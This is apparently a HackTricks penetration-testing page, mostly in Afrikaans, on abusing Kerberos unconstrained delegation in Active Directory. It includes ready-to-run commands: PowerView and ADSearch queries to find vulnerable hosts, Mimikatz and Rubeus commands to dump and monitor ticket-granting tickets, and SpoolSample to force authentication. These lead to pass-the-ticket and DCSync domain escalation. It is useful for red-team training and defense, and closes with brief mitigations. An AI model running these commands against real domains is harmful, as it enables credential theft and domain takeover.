5.8 KiB
Unconstrained Delegation
{% hint style="success" %}
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Unconstrained delegation
Dit is 'n kenmerk wat 'n Domein Administrateur kan stel op enige Rekenaar binne die domein. Dan, wanneer 'n gebruiker aanmeld op die Rekenaar, sal 'n kopie van die TGT van daardie gebruiker binne die TGS wat deur die DC gestuur word en in geheue in LSASS gestoor word. So, as jy Administrateur regte op die masjien het, sal jy in staat wees om die kaartjies te dump en die gebruikers te verpersoonlik op enige masjien.
So as 'n domein admin aanmeld op 'n Rekenaar met die "Unconstrained Delegation" kenmerk geaktiveer, en jy het plaaslike admin regte op daardie masjien, sal jy in staat wees om die kaartjie te dump en die Domein Admin enige plek te verpersoonlik (domein privesc).
Jy kan Rekenaar objek met hierdie attribuut vind deur te kyk of die userAccountControl attribuut ADS_UF_TRUSTED_FOR_DELEGATION bevat. Jy kan dit doen met 'n LDAP filter van ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, wat is wat powerview doen:
# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTsLaai die kaartjie van die Administrateur (of slagoffer gebruiker) in geheue met Mimikatz of Rubeus vir 'n Pass the Ticket.
Meer inligting: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
Meer inligting oor Unconstrained delegation in ired.team.
Force Authentication
As 'n aanvaller in staat is om 'n rekenaar wat toegelaat word vir "Unconstrained Delegation" te kompromitteer, kan hy 'n Druk bediener mislei om outomaties aan te meld teen dit en 'n TGT in die geheue van die bediener te stoor.
Dan kan die aanvaller 'n Pass the Ticket aanval uitvoer om die gebruiker se Druk bediener rekenaarrekening te verpersoonlik.
Om 'n druk bediener teen enige masjien aan te meld, kan jy SpoolSample gebruik:
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
If the TGT if from a domain controller, you could perform a DCSync attack and obtain all the hashes from the DC.
More info about this attack in ired.team.
Hier is ander maniere om te probeer om 'n outentisering te dwing:
{% content-ref url="printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}
Mitigering
- Beperk DA/Admin aanmeldings tot spesifieke dienste
- Stel "Rekening is sensitief en kan nie gedelegeer word nie" vir bevoorregte rekeninge.
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.